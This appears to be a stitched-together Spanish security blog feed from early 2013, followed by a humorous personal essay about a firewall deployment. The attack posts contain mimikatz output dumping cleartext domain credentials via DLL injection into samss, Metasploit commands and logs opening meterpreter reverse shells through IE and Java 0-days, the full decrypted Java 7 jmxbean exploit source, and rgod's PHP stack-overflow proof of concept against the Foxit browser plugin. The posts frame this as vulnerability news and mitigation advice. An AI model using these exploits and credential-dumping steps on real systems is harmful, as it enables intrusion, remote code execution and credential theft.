mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Jan  8 2013 03:21:59) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # system::user
Utilisateur : DOMINIO\W7PTVMOTOS$

mimikatz # divers::secrets full
Nombre de secrets : 1
TargetName         : Domain:batch=TaskScheduler:Task:{8969C678-9214-4D2F-96F2-A7F5A89491EF} /
Type               : DOMAIN_PASSWORD (2)
Comment            :
UserName           : DOMINIO\vmotos
Credential         :

Como véis las credenciales se almacenan en formato contraseña de dominio (CRED_TYPE_DOMAIN_PASSWORD) y no se muestran porque sólo pueden ser leídas por paquetes de autenticación de Microsoft (NTLM, Kerberos y otros paquetes de negociación de autenticación).

Veamos que lo mismo ocurre con las contraseñas almacenadas en el administrador de credenciales:


mimikatz # system::user
Utilisateur : DOMINIO\vmotos

mimikatz # divers::secrets full
TargetName         : Domain:target=TERMSRV/192.168.137.23 /
Type               : DOMAIN_PASSWORD (2)
Comment            :
UserName           : DOMINIO\administrator
Credential         :
Para obtener las contraseñas en este caso, mimikatz hace uso de CredIEnumerate (no documentado) que puede listar los secrets de una sesión en particular (no sólo la del usuario actual):
typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE)    (IN PLUID pLUID, IN DWORD unk0,    IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials);
typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE62) (IN PLUID pLUID,                IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials);

Una vez identificadas, se extrae desde el administrador de credenciales mediante CrediReadDomainCredentials y se descifra el buffer de memoria mediante la función LsaUnprotectMemory. Para ello, lo que haremos en esta ocasión es inyectar la librería sekurlsa.dll dentro del servicio de Administrador de cuentas de seguridad (samss) para extraer los hashes de las contraseñas y los systems secrets. Posteriormente y mediante el método getCredman obtendremos las contraseñas en claro... el resultado es espectacular ;):
D:\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Jan  8 2013 03:21:59) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::service samss sekurlsa.dll
SERVICE(samss).serviceDisplayName = Administrador de cuentas de seguridad
SERVICE(samss).ServiceStatusProcess.dwProcessId = 676
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getCredman full

Authentification Id         : 0;999
Package d'authentification  : Negotiate
Utilisateur principal       : W7PTVMOTOS$
Domaine d'authentification  : DOMINIO
        credman :
         * [0] Target   : Domain:batch=TaskScheduler:Task:{8969C678-9214-4D2F-96F2-A7F5A89491EF} /
         * [0] Comment  :
         * [0] User     : DOMINIO\vmotos
               [0] User : DOMINIO\vmotos
               [0] Cred : Prueba123

Authentification Id         : 0;12663081
Package d'authentification  : Kerberos
Utilisateur principal       : vmotos
Domaine d'authentification  : DOMINIO
        credman :
         * [1] Target   : Domain:target=TERMSRV/192.168.137.23 /
         * [1] Comment  :
         * [1] User     : DOMINIO\administrator
               [0] User : DOMINIO\administrator
               [0] Cred : Prueba123

mimikatz #

Fuente: http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-credman

Ejecución de código arbitrario en Microsoft Internet Explorer 6, 7 y 8 (0 day user-after-free)

$
0
0
Hace unos días salía a la palestra de nuevo Microsoft Internet Explorer, a lo cual dicho sea de paso nos tiene más que aconstumbrados...

La razón es que Microsoft ha confirmado una vulnerabilidad de día 0 que afecta al navegador Internet Explorer 6, 7 y 8 (las versiones 9 y 10 no se ven afectadas).

El problema, al que se la que se le ha asignado el CVE-2012-4792, reside en que se accede a un objeto en la memoria que se ha eliminado o que se ha asignado incorrectamente (use-after-free) lo cual permite la ejecución de código arbitrario con los privilegios que tenga el usuario. Esta vulnerabilidad además puede permitir la elevación de privilegios y el compromiso de la totalidad del sistema.

Se han detectado ataques que explotan esta vulnerabilidad, como es el caso de la web http://www.cfr.org/ comprometida esta semana y, hasta el momento, Microsoft sólo aporta una solución rápida (“solución Fix it”) hasta la publicación del correspondiente parche en el boletín de actualizaciones: http://support.microsoft.com/kb/2794220.

También se ha publicado un exploit en el framework Metasploit. Os adjunto los comandos y un ejemplo gráfico de su ejecución:
use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid


Bueno y para el que se sienta juguetón:
 

Nuevo 0-day de Java urge a desactivar el plugin del navegador

$
0
0
Hace unas horas Kafeine nos avisaba en su blog 'Malware don't need Coffee' de un nuevo 0-day que parece afectar a todas las versiones de Java 7 (incluida la actualización 10) y que podría permitir a un atacante ejecutar código arbitrariamente.

De momento no existe un análisis técnico detallado del problema, que parece ser una combinación de dos vulnerabilidades (una de ellas en el API Reflection), pero ya se han identificado numerosos sitios que podrían haber sido comprometidos a principios de año y que contienen este exploit para instalar malware de forma silenciosa (drive-by-download). Basta que el equipo de la víctima utilice un navegador con el plugin de java activado...

Todavía no hay parche de Oracle (el Critical Patch Updates oficial está previsto para el 15 de enero) y el código ya circula por Internet. Además el crimeware no pierde el tiempo para añadirlo a su arsenal: Blackhole, Nuclear Pack, Cool, Redkit... por lo que la única solución pasa pordesactivar Java hasta nueva noticia.

ACTUALIZACIÓN 13/01/2013: Oracle publica Java SE 7 Update 11 que soluciona la vulnerabilidad CVE-2013-0422:  

ACTUALIZACIÓN 17/01/2013: “En base a nuestro análisis, hemos confirmado que la reparación para CVE-2013-0422 es incompleta”, señaló Pawan Kinger, investigador de Trend Micro. Según dice, la vulnerabilidad proviene de fallos en dos partes del código base de Java, y el parche sólo reparó uno de las dos, dejando un agujero que todavía se puede explotar. Fte. FayerWaver

Por último, Metasploit también ha añadido el móduloque ya es totalmente funcional:
 Call trans opt: received. 2-19-98 13:24:18 REC:Loc  
  
    Trace program: running 
  
       wake up, Neo... 
     the matrix has you 
    follow the white rabbit. 
  
      knock, knock, Neo. 
  
             (`.     ,-, 
             ` `.  ,;' / 
              `. ,'/ .' 
              `. X /.' 
         .-;--''--.._` ` ( 
        .'      /  ` 
        ,      ` '  Q ' 
        ,     ,  `._  \ 
      ,.|     '   `-.;_' 
      : . ` ;  ` ` --,.._; 
       ' `  ,  )  .' 
        `._ , '  /_ 
          ; ,''-,;' ``- 
          ``-..__``--` 
  
  
     =[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
 + -- --=[ 1074 exploits - 570 auxiliary - 170 post 
 + -- --=[ 265 payloads - 28 encoders - 8 nops 
  
 msf > use exploit/multi/browser/java_jre17_jmxbean 
 msf exploit(java_jre17_jmxbean) > rexploit 
 [*] Reloading module... 
 [*] Exploit running as background job. 
  
 [*] Started reverse handler on 192.168.1.128:4444  
 [*] Using URL: http://0.0.0.0:8080/j5jwNI 
 [*] Local IP: http://192.168.1.128:8080/j5jwNI 
 [*] Server started. 
 msf exploit(java_jre17_jmxbean) > [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI 
 [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI/ 
 [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI/GapYRtBm.jar 
 [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI/GapYRtBm.jar 
 [*] Sending stage (30216 bytes) to 192.168.1.147 
 [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:2391) at 2013-01-10 20:41:37 +0100 
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI 
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI/ 
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI/sNJpvmja.jar 
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI/sNJpvmja.jar 
 [*] Sending stage (30216 bytes) to 192.168.1.128 
 [*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.128:54260) at 2013-01-10 20:41:47 +0100 
  
 msf exploit(java_jre17_jmxbean) > sessions -i 1 
 [*] Starting interaction with 1... 
  
 meterpreter > sysinfo 
 Computer  : juan-c0de875735 
 OS     : Windows XP 5.1 (x86) 
 Meterpreter : java/java 
 meterpreter > exit 
 [*] Shutting down Meterpreter... 
  
 [*] 192.168.1.147 - Meterpreter session 1 closed. Reason: User exit 
 msf exploit(java_jre17_jmxbean) > sessions -i 2 
 [*] Starting interaction with 2... 
  
 meterpreter > sysinfo 
 Computer  : Juans-MacBook-Pro.local 
 OS     : Mac OS X 10.7.5 (x86_64) 
 Meterpreter : java/java 
 meterpreter > exit 
 [*] Shutting down Meterpreter... 
  
 [*] 192.168.1.128 - Meterpreter session 2 closed. Reason: User exit 


Bonus - código descifrado desde Rusia con amor:
/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
*/

import java.applet.Applet;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;

public byte[] hex2Byte(String paramString)
{
    byte[] arrayOfByte = new byte[paramString.length() / 2];
    for (int i = 0; i < arrayOfByte.length; i++)
    {
      arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
    }
    return arrayOfByte;
 }

public static String ByteArrayWithSecOff = & #34;CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001
 00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501
 00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578
 63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F
 07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263
 6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F
 457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142
 0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469
 6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F
 50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445
 7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176
 612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A
 6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000
 020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100
 040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600
 02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107
 0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000
 02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600
0000020017";

  public void init()
  {
    try
    {

      byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
      JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
      JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
      MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
      ClassLoader a = null;
      Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
      Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
      MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
      MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
      MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
      MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
      MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
      Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
      MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
      MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
      MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
      MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
      Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
      MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
      MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
      Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
      localClass3.newInstance();
      Runtime.getRuntime().exec("calc.exe");
    }  
   catch (Throwable ex) {}
  }
 }

Vulnerabilidad crítica en el plugin Foxit PDF de Firefox (o aquí no se salva ni Perry)

$
0
0
Desde hace tiempo utilizo Foxit Reader como lector pdf por defecto, es ligero, rápido y consume menos recursos que Adobe Reader. Además el malware viene azotando continuamente a Adobe por simple economía de guerra: la mayoría de los usuarios lo utilizan y las probabilidades de propagarse son mayores. ¿Puedo entonces embutirme en mi batín mientras azuzo el fuego de una chimenea y entono el publicitario eslogan "me siento seguroooo"? Ni mucho menos...

Desde Adobe Reader X la seguridad se orienta al sandboxing y se han aplicado y se aplican múltiples correcciones como consecuencia de las vulnerabilidades descubiertas por un ejército de beta-testers deseosos de abrir las puertas a sus artefactos maliciosos. Por eso quizás Foxit Reader no sea el enemigo público número uno, pero eso no significa que sea más seguro.

El consultor italiano Andrea Micalizzi, alias rgod, nos lo recuerda recientemente mediante la publicación de una vulnerabilidad que afecta, eso sí, al plugin Foxit PDF para el navegador. Es decir, el bug no está presente en el lector PDF en sí mismo, si no en la librería npFoxitReaderPlugin.dll que actúa como intermediaria entre Foxit Reader y el navegador.

Concretamente el código es vulnerable a un desbordamiento de pila al procesar enlaces con peticiones largas. La prueba de concepto es contundente: actualmente funciona en la última versión de Firefox (18.0) y en laúltima versión de Foxit Reader (5.4.4.1128) con su plugin (2.2.1.530). 
Echemos un vistazo al código de rgod:
<?php/*

Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong
Query String Remote Stack Buffer Overflow PoC --------------------------- rgod

(listener)

Tested against Microsoft Windows
Mozilla Firefox 17.0.1
Foxit Reader 5.4.3.0920
Foxit Reader 5.4.4.1128

File: npFoxitReaderPlugin.dll
Version: 2.2.1.530

Product url: http://www.foxitsoftware.com/downloads/
Last version setup file: FoxitReader544.11281_enu_Setup.exe

Usage:
Launch from the command line, then browse port 6666 with Firefox.
You can test it also through this url:

http://192.168.0.1/x.pdf?[A x 1024]

File must be existing or the server should be responding with
the proper Content-Type header.

vulnerable code, npFoxitReaderPlugin.dll:

;------------------------------------------------------------------------------
L1000162F:
push ebx
push esi
push edi
mov edi,ebp
or ecx,FFFFFFFFh
xor eax,eax
xor ebx,ebx
xor esi,esi
repne scasb
not ecx
dec ecx
test ecx,ecx
jle L100016E4
L1000164A:
mov al,[esi+ebp]
mov word ptr [esp+18h],0000h
cmp al,25h
jz L10001661
mov ecx,[esp+1Ch]
mov [ebx+ecx],al
jmp L100016CE
L10001661:
mov al,[esi+ebp+01h]
cmp al,30h
jl L1000166D
cmp al,39h
jle L1000167D
L1000166D:
cmp al,41h
jl L10001675
cmp al,46h
jle L1000167D
L10001675:
cmp al,61h
jl L100016C6
cmp al,66h
jg L100016C6
L1000167D:
mov dl,[esi+ebp+01h]
inc esi
inc esi
lea ecx,[esp+10h]
mov [esp+18h],dl
push ecx
mov al,[esi+ebp]
lea edx,[esp+1Ch]
push L100450D4
push edx
mov [esp+25h],al
call SUB_L10006421
mov eax,[esp+1Ch]
lea ecx,[esp+24h]
push eax
push L100450D0
push ecx
call SUB_L100063CF
mov eax,[esp+34h]
mov dl,[esp+30h]
add esp,00000018h
mov [ebx+eax],dl
jmp L100016CE
L100016C6:
mov ecx,[esp+1Ch]
mov byte ptr [ebx+ecx],25h
L100016CE:
inc ebx
mov edi,ebp
or ecx,FFFFFFFFh
xor eax,eax
inc esi
repne scasb
not ecx
dec ecx
cmp esi,ecx
jl L1000164A
L100016E4:
mov edx,[esp+1Ch]
pop edi
pop esi
mov eax,00000001h
mov byte ptr [ebx+edx],00h
pop ebx
pop ebp
pop ecx
retn
;------------------------------------------------------------------------------

this copy loop ends up in overwriting stack pointers, then
(by attaching to plugin-container.exe):

(f48.1778): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
10016852 8906 mov dword ptr [esi],eax ds:0023:41414141=????????
...
Attempt to write to address 41414141
...

also SEH pointers are overwritten
*/

error_reporting(0);

set_time_limit(0);

$port = 6666;

$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
"Server: Apache\r\n".
"Location: /x.pdf?".str_repeat("A",1024)."\r\n".
"Content-Type: text/html\r\n\r\n";

$____boom = "HTTP/1.1 200 OK\r\n".
"Server: Apache\r\n".
"Accept-Ranges: bytes\r\n".
"Content-Length: 60137\r\n".
"Content-Type: application/pdf\r\n".
"Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

if (!$socket) {
echo "$errstr ($errno)\n";
} else {
echo "Listening on public tcp port ".$port." \n";
while ($conn = stream_socket_accept($socket)) {
$line=fgets($conn);
echo $line."\n";
if (strpos($line,".pdf")){
fwrite($conn,$____boom);
}
else {
fwrite($conn,$____redirect);
}
fclose($conn);
}
fclose($socket);
}
?>

Ahora ejecutamos el php (x.php en mi ejemplo) desde la línea de comandos de nuestro Windows 7: 

D:\xampplite\htdocs>d:\xampplite\php\php.exe -f x.php
Listening on public tcp port 6666
GET /x.pdf?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP
/1.1
Y finalmente apuntamos al puerto y dirección correcta en nuestro navegador: 
 
 
Como véis hemos provocado el crash del plugin sin apenas despeinarnos... 

Actualmente no existe ninguna actualización que lo solucione y otras versiones de Foxit Reader y de otros navegadores (Firefox, Chrome y Safari) podrían ser vulnerables, por lo que se recomienda desactivar el plugin hasta nuevo aviso: 


Al desactivarlo los ficheros PDF no serán abiertos directamente en el navegador y se cargaran en un proceso nuevo de Foxit Reader, evitando así el uso de la DLL vulnerable del plugin. 


Fuente: Vulnerability reported in Foxit PDF plugin for Firefox - how to mitigate it

Actualización 18/01/2012:

Firewall Femme Fatale (esto me sucedió en 2010): Parte 1

$
0
0
***Ladies and Gentleman: Demontre Digital Unplugged. Las confesiones amargas de un ingeniero. Ríanse de mí, mis estimados lectores…

Se los voy a contar de una vez, voy a escribir este texto de corrido y sin pausa, si no luego me va a dar tentación de inventarles o añadirles melodrama. O peor aún de decirles mentiras. Sorry, pero me tengo que super explayar nuevamente. Porque ésta es de una de esas cosas, que “sacan a relucir los trapitos al Sol”; el orgullo y el ego son expuestos claramente de quien se siente una pistola, y que no más no pasa del noob cualquiera, rozándole al lammer. Y no exagero, así me sentí alguna vez. Sobre todo cuando regresé de la Ingeniería. Cosas oscuras que uno nunca le cuenta ni al espejo, bueno ni a la almohada siquiera, ahora imagínense a un auditorio lleno de técnicos maduros y voraces y en un sitio dedicado a la tecnología como éste. Ojalá no me fulminen muchachos. Uno va por la vida y hace las cosas como se le ocurre, o se le antoja, o lo que sea, hasta que llega el punto en que dices: "espérate, qué estoy haciendo, qué diantres te sucede". Y es peor cuando combinas el hecho de que sientes que puedes solo, no pides ayuda y te tienes una confianza soberbia que no hace más que arruinarlo todo. Digo que de repente hay como una bardita que te saltas y piensas: Nadie que yo conozca se ha saltado esta barda, yo me la estoy saltando, soy un machote. Soy un hacker.

Pues hagan de cuenta que era eso lo que calculaba cuando un día, en vidas pasadas, me asignaron mi primer caso de implementación de Seguridad Perimetral, para mí solito. Me doy un poco de asco cuando recuerdo la forma en cómo sucedió todo….***

¿Cómo quieren que empiece, pues? ¿Les cuento del origen de mi apestosa calaña? ¿Quieren saber a qué edad M3 Gu5t4b4 35cr1b1r 4s1 creyéndome The Mentor? ¿Cuáles fueron mis primeros programas mágicos con un botonsote en VB que decía “HACK THE WORLD”?? Mi primera vez con el “vi” de UNIX?? Cuando creí que ya sabía Networking porque ejecutaba a la perfección “save running config”??, Cuando quité un malware con el Norton y me creía un sanguinario de los Virus?? O más romántico me quieren…mi primera princesa convertida en sapo?? ¿No prefieren que antes de eso les dé tiempo para ponerse cómodos y que se puedan “pitorrear” de mí un ratote enorme?? No creo, porque no les serviría, y además ya bastante inextricable estoy en este texto para colocarme desde ahorita en las garras de mis lectores.


I summon the vast power of certification

Pero bueno no soy ningún ingenuo, sé lo que hago, soy quien soy: el lammer caído, la oveja negra de mi cliente/víctima, el ingeniero certificado y no apto, el que está de necio tecleando quién sabe qué con la línea de comandos, el brujo de este cuento. Bueno, ni modo de esperar que me pongan de princesa, no?? No espero nada, de hecho el gran problema es que siempre he sido un desesperado: quiero acabarlo todo cuando ni he comenzado. Así que igual empiezo con un cuento. Anótenle:


Había una vez un Ingeniero en Seguridad novatón, que un día trabajaba para una compañía cuyo nombre no se revelará en esta historia. Dicho Ingeniero, A.K.A adivinen quién, disfrutaba enormemente de cada jornada laboral pues aprendía muchas cosas como esponjita. Su jefa, tenía una jefa, procuraba que su Padawan absorbiera las mejores experiencias en el área de IT Security acompañando a los más experimentados y veteranos combatientes de guerra, en cada batalla que acontecía. El Padawan pensaba que así podría instruirse en los secretos del Ingeniero, para algún día “conocer la esencia de todas las cosas, su transformación y su renovación, conocer el secreto del Sol y de la Luna, las leyes que rigen el curso de las estrellas en el firmamento; las imágenes mágicas de las nubes y el aire; los misterios del mar. Conocer los demonios que envían sueños bajo la Luna. Comprender el grito áspero de la corneja, el volar cantarín de los cisnes, la resurrección del fénix. Poder interpretar el vuelo de los cuervos, el rumbo de los peces y las ideas ciegas de los hombres, predecir todas las cosas que sucederían después y configurar adecuadamente políticas de seguridad en dispositivos perimetrales alineados a las best practices” (si les sonó a Merlín es pura coincidencia eh) haciendo honrar su puesto de trabajo, como el warrior que debía y tenía que convertirse para afrontar las futuras beligerancias. Pero al sentir el poder que da el conocimiento, el Padawan fue manoseado por el lado oscuro (súper mega cliché no?? Estereotipo al máximo… no les da asco de veras??). Y le solicitó a su jefa que le asignara un caso para él sólo, para atenderlo, triunfar sobre él y regresar con la cara en alto. Un caso complejo aparte (la ambición, la ambición…). Nadie podía explicarse cómo una mujer tan buena se había dejado seducir por aquel ingenierito de mala entraña. Entonces sus demás compañeros los vieron salir a los dos de la salita de juntas con pared de cristal y sillas verdes. Cuando le preguntaron al ingenierito cómo le había hecho para que ella aceptara, él les contó que le había prometido hacer un excelentísimo trabajo a reserva de pagar los subsiguientes desayunos por tiempo indefinido (entre otras cosas), si no podía con el paquete. Y ellos, claro, se derritieron del rencor y de la envidia, porque a pesar de que la jefa puso otras condiciones como dije, sabían que nunca en sus re corrientes vidas iban a tener una oportunidad aprobada por ella así de linda y de rifada. Pero se equivocaban, porque… si tuve que pagarle el desayuno a uno de ellos, aunque le hizo daño por envidioso. Anyway, mientras sus almas de envidiosos rascuaches se quebrantaban al unísono, se escuchaba una voz en mi interior diciendo:«Yo soy el elegido para ir a ese canal/cliente e implementar su arquitectura de seguridad, quien apueste por mí no volverá a ver la oscuridad». Fail.

Octubre de 2010, Datacenter de X y headquarters de Y

***Ser Ingeniero de Seguridad TI es como bailar: cuestión de agarrar los pasos…y los muy malos pasos. Los maestros que nos enseñaban clases de Seguridad Informática como Attack Prevention, Offensive Security y demás, en la escuela, nos decían: los pensamientos más abstractos y elaborados galopan cabalgados por demonios. Pero ser Inge no es un mal pensamiento. Es más: no es ni siquiera un pensamiento. En la universidad, los maestros nos pedían que pensáramos en Python, o en Bash, o dentro del kernel y mejor ni les digo lo que se me ocurría. ¿En qué piensas, idiota? Animal, bestia. Muy ingeniero y muy creativo, pero a la hora de la hora también piensas con la de… me ar repiento de no haberles hecho mucho caso a veces, cuando te dicen que este tipo de carrera te engolosina de más, si no sabes controlarte. Y si no te apegas a lo estrictamente académico, o le bajas los decibeles a tu curiosidad por el gusto de la curiosidad. Porque si no te controlas lo aprendes a hacer a la fea manera.

(Platicando con un Gray Hat en la Campus Party 2009, Expo Bancomer Santa Fe, Noviembre 2009, Seguridad/Redes). ***

Mi cliente me esperaba con la ciega esperanza de quien cree que todo terminará en un día. O más lastimosamente en un par de horas. No sé por qué razón los tipos que llevan más de 20 años según ellos en el campo de TI, piensan que cualquier implementación es del tipo “Siguiente >Siguiente >Aceptar”. Inverosímil.

La situación se planteaba de esta manera: Mi víctima había adquirido de nosotros un firewall de nueva generación, ustedes ya investigarán qué son estos o quizá muchos ya lo sepan, no ahondaré en ello. Les puedo adelantar únicamente que las implementaciones con este tipo de plataformas distan de ser parecidas a los firewalls “normales”. Ahora con cierta experiencia les puedo decir que instalar un Juniper, un Checkpoint, un Cisco, etc. es básicamente “la misma gata pero revolcada”, y un next generation firewall tiene su particular chiste. Bueno.

El cliente mostraba un escenario de reemplazo tecnológico, su firewall actual estaba en extinción, necesitaba un cambio de aires, y al hacer el análisis previo los puntos relevantes que involucraron mi desgracia fueron los siguientes:

1.- El Firewall se posicionaría como la frontera entre su LAN y la WAN, es decir el breakpoint entre el carrier y su red Interna.
2.- Como un clásico firewall se segmentaría en zonas; básicamente constaba de una Untrust, Trust, DMZ y una zona que yo le llamé “La morada del Nigromante”, (por qué lo llamé así, esto lo sabrán más adelante).
3.- Como una solución todoterreno también iba a tener activado los features de inspección, detección de intrusos, antivirus, que haga café irlandés, baile y cante como barítono y castrato.
4.- Por supuesto, constaría de NAT’s Internos, mapeos a servicios desde la zona Untrust, y políticas entre zonas inherentes a la configuración, whatever.

Cómo ven cachorros? A simple vista uno piensa (y no los culpo): Es posible que puedas elaborar una tragedia de semejantes cosas de rutina, (vaya un ingeniero de Seguridad Perimetral no debería tener problemotas con este escenario), en el que uno puede de antemano saber que se requieren +- 5 horas a lo sumo, para get the fucking job done??

La verdad, si les hago una confesión hecha y derecha, yo mismito agarré y casi me orino de la risa, por mi proyecto tan “complejo”. Yo sentía que ni la reina de Inglaterra merecía que le arreglara su módem, ahora imagínenme pensando “a este tlahuica, lo voy a impresionar cuando acabe con su proyecto del año en 2 horitas y me firme mi orden de servicio con una estrella de la orden teutónica”.

Pues yo llegué al sitio bien envalentonado, con mi Dell Inspiron lista, con mi cable de consola listo y mi risa malévola aún más lista. Algo que no les mencioné cachorros, de los 4 puntitos anteriores, es que en esa primera visita no iba a hacer absolutamente nada de nada. Iba a ser algo en principio millones de veces más fácil.

